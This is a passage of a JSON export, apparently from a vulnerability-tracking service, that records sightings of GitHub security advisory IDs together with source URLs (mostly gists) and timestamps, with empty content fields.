"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/48d4d415e550f60b744171da16b87501", "content": "", "creation_timestamp": "2025-07-16T03:12:53.000000Z"}, {"uuid": "0d6fb70c-64cc-4413-ad98-db577a5e2312", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/48d4d415e550f60b744171da16b87501", "content": "", "creation_timestamp": "2025-07-16T03:12:53.000000Z"}, {"uuid": "c0e405b5-c2d0-4e8f-bbbf-0495c59f7ddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/48d4d415e550f60b744171da16b87501", "content": "", "creation_timestamp": "2025-07-16T03:12:53.000000Z"}, {"uuid": "0e09f443-8065-4efb-9a90-00445742ef83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "ad680d59-db5f-4bde-ae9e-8b7cd191b381", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "47c34e48-2522-49f7-8b71-789972b9cbc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "4f06cb25-5765-40d5-a6e8-570788139158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gw85-4gmf-m7rh", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "c184d04a-bf03-4409-bc98-7d4786cf3afb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "e26b4a6c-cac4-4812-a1a2-83984b5c3268", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "58ad875d-9121-4a23-a94f-b0bec948a688", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "98a7ed2f-3d4f-4901-b15d-f2577c921d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f946-j5j2-4w5m", "type": "seen", "source": "https://bsky.app/profile/nixpkgs-prs-bot.bsky.social/post/3lszgkpezi726", "content": "", "creation_timestamp": "2025-07-03T00:05:08.217336Z"}, {"uuid": "f9f207fd-6804-4d89-bc0f-6a60f76b999c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "c4812a9e-ab41-49ef-84da-c656da4de810", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "15c1f8ce-751f-4b92-8282-9d9fe1ca8fd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "d5dfc695-ee19-4c9b-a65a-4cdd800a37b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/7e9214e70b2df8624985ccaaea62cdd9", "content": "", "creation_timestamp": "2025-07-07T04:16:11.000000Z"}, {"uuid": "c281a65c-37b5-4549-80af-b50c2b94e315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcpx-h44g-vx2x", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114626187303924509", "content": "", "creation_timestamp": "2025-06-04T17:06:54.283057Z"}, {"uuid": "c5f6ac8c-af61-4f4d-b9e9-81e5271d5cd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "2a711ca0-a443-49fa-a03d-d439ea4f56e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "03e44003-5896-46e5-8e17-e9459f8f1b71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "46b71e4a-50e7-4b1c-a0e4-c3407ed7f309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "bda6289b-e4f0-44a4-ac64-ca800943cab0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-493p-pfq6-5258", "type": "seen", "source": "https://gist.github.com/safer-bot/fe2fd1104f8d87898cd6cbdb2c5e4073", "content": "", "creation_timestamp": "2025-07-16T08:00:50.000000Z"}, {"uuid": "4cce53f4-958b-45f3-89ee-5c68209c25ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/707e96a20cbce70f11457a47381ed252", "content": "", "creation_timestamp": "2025-07-16T12:17:46.000000Z"}, {"uuid": "bbefece8-81c1-43d8-ade6-f0d371848222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/707e96a20cbce70f11457a47381ed252", "content": "", "creation_timestamp": "2025-07-16T12:17:46.000000Z"}, {"uuid": "34844643-bea6-4db9-82a0-aa92d5bcf34d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "a26c2949-6fd5-4df6-b41b-22a475f7e164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "4090d704-cf3f-4718-bf54-4f32dc2a66b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "50a8c0d1-309c-4548-9e73-90d7929943d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2rwm-xv5j-777p", "type": "seen", "source": "https://gist.github.com/safer-bot/fe2fd1104f8d87898cd6cbdb2c5e4073", "content": "", "creation_timestamp": "2025-07-16T08:00:50.000000Z"}, {"uuid": "badbd738-37a8-42d1-9450-0e4b3d959668", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "d885aefa-a787-4cc5-aa54-fc96289f5764", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "dd653807-310f-4521-9229-25b54664db69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "4bb13d59-e9d7-4d0b-b744-74136d5953c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "cb5137ff-3f4f-4ee4-94b2-beadcf2b6bb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "d449cd92-83d3-471d-a5c0-16504ed264b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "b8fb37fb-4ca3-4cb9-8243-3d338a416c22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "23b569d8-3d38-48fd-bd5c-7591dce6fa92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "9c16a1a6-5889-4227-95e8-9511a26b2cc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "e9ea772c-bfff-479b-88a1-00ff0d8512c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/745111e2ea91d8d614252b4c03604b3d", "content": "", "creation_timestamp": "2025-07-07T04:16:40.000000Z"}, {"uuid": "868fc97b-721f-47df-ba48-3ce0178b099c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pfh2-hfmq-phg5", "type": "seen", "source": "https://gist.github.com/safer-bot/2af29f281eeb8d7a86455b607f77d23e", "content": "", "creation_timestamp": "2025-07-16T08:01:57.000000Z"}, {"uuid": "32d5076e-1d8a-4db3-b42d-e511926fa7a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/2af29f281eeb8d7a86455b607f77d23e", "content": "", "creation_timestamp": "2025-07-16T08:01:57.000000Z"}, {"uuid": "df949091-466b-49cb-a1aa-a2c758905139", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v528-7hrm-frqp", "type": "seen", "source": "https://gist.github.com/safer-bot/2af29f281eeb8d7a86455b607f77d23e", "content": "", "creation_timestamp": "2025-07-16T08:01:57.000000Z"}, {"uuid": "5eca4440-19f3-4a1e-a650-d5c1196aff09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/2af29f281eeb8d7a86455b607f77d23e", "content": "", "creation_timestamp": "2025-07-16T08:01:57.000000Z"}, {"uuid": "5641177c-2e32-4a9e-8cbc-754a7bdc17c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/2af29f281eeb8d7a86455b607f77d23e", "content": "", "creation_timestamp": "2025-07-16T08:01:57.000000Z"}, {"uuid": "da94a72a-d56e-4b45-ad29-ebe42cd28a0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-493p-pfq6-5258", "type": "seen", "source": "https://gist.github.com/safer-bot/2af29f281eeb8d7a86455b607f77d23e", "content": "", "creation_timestamp": "2025-07-16T08:01:57.000000Z"}, {"uuid": "8a266647-0fa3-49ef-8273-8c7d3b7742e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/2af29f281eeb8d7a86455b607f77d23e", "content": "", "creation_timestamp": "2025-07-16T08:01:57.000000Z"}, {"uuid": "9d88ee97-128d-4832-90a2-77b80039fb82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/2af29f281eeb8d7a86455b607f77d23e", "content": "", "creation_timestamp": "2025-07-16T08:01:57.000000Z"}, {"uuid": "ba7b9a76-5b2e-40d6-a2de-7e6652bac4f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "7aa2b6aa-4b24-436e-814a-80fee04477d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "20614676-a2d0-4e24-b4db-9142f1dd4b1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "a544b0ce-5904-459b-aa91-32cb9e0eb7dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "bfc17ed8-e78a-432d-a48a-e3723f9392aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "b3874cda-c5d9-4aed-a464-538c5a426722", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "f510472a-6f66-45a0-a842-b1256b3bc029", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/f69856c284c91ff5cadf52c6a22a30c8", "content": "", "creation_timestamp": "2025-07-16T08:04:51.000000Z"}, {"uuid": "09a702b5-e5eb-4c58-867c-d8bf2e604a4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/f69856c284c91ff5cadf52c6a22a30c8", "content": "", "creation_timestamp": "2025-07-16T08:04:51.000000Z"}, {"uuid": "c42bcab5-3c01-4ffa-bbf8-ceaf58d9d3cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "1490a274-107f-49d6-aff4-2cd515a5768a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/8245bf781c03bc7c9b0140593ee2c84d", "content": "", "creation_timestamp": "2025-07-16T12:19:28.000000Z"}, {"uuid": "fbbcff17-3357-4b12-97e9-922bf009cfd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "c6fc5568-b817-47c4-ade1-3af3124332b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "b02b9a9c-d27f-4a18-8936-917228c2deda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "cb515c6c-e720-4227-bf59-43211b7e529b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "b2dcb550-a3ee-42b0-a932-4c99bd35ce66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/a0df2ffd75d12e1484a3ceb77618b263", "content": "", "creation_timestamp": "2025-07-07T04:19:06.000000Z"}, {"uuid": "8f50bc3e-91c2-4336-9f72-d78381a64b77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/f69856c284c91ff5cadf52c6a22a30c8", "content": "", "creation_timestamp": "2025-07-16T08:04:51.000000Z"}, {"uuid": "9befd161-d6d8-427b-8a10-e80caa973ebd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/f69856c284c91ff5cadf52c6a22a30c8", "content": "", "creation_timestamp": "2025-07-16T08:04:51.000000Z"}, {"uuid": "6ed13709-8c9a-4696-8e4f-afd0a2a302c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/90009d688810da3eb04e84228fcd9ac4", "content": "", "creation_timestamp": "2025-07-16T13:28:31.000000Z"}, {"uuid": "c4c1d6b5-c351-4ca6-b1b9-925753658d10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47g3-mf24-6559", "type": "seen", "source": "https://gist.github.com/safer-bot/90009d688810da3eb04e84228fcd9ac4", "content": "", "creation_timestamp": "2025-07-16T13:28:31.000000Z"}, {"uuid": "d9ff85ab-c133-4436-8a74-ac8756dbca7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/90009d688810da3eb04e84228fcd9ac4", "content": "", "creation_timestamp": "2025-07-16T13:28:31.000000Z"}, {"uuid": "5a06d5ce-4514-40c8-bdd8-5a3e6eff3ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/90009d688810da3eb04e84228fcd9ac4", "content": "", "creation_timestamp": "2025-07-16T13:28:31.000000Z"}, {"uuid": "11caa836-d0d3-4933-8438-df49fa7f97bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "d3d93468-5903-4181-8832-6c0a18b84bc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "9861bfc2-5cf0-400a-adc8-9961199d2028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/f69856c284c91ff5cadf52c6a22a30c8", "content": "", "creation_timestamp": "2025-07-16T08:04:51.000000Z"}, {"uuid": "3cc5e3a9-4b5a-495b-9651-3a2fee14c016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/f69856c284c91ff5cadf52c6a22a30c8", "content": "", "creation_timestamp": "2025-07-16T08:04:51.000000Z"}, {"uuid": "e410e7d9-087c-4db6-ac29-b4c23d4f74c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 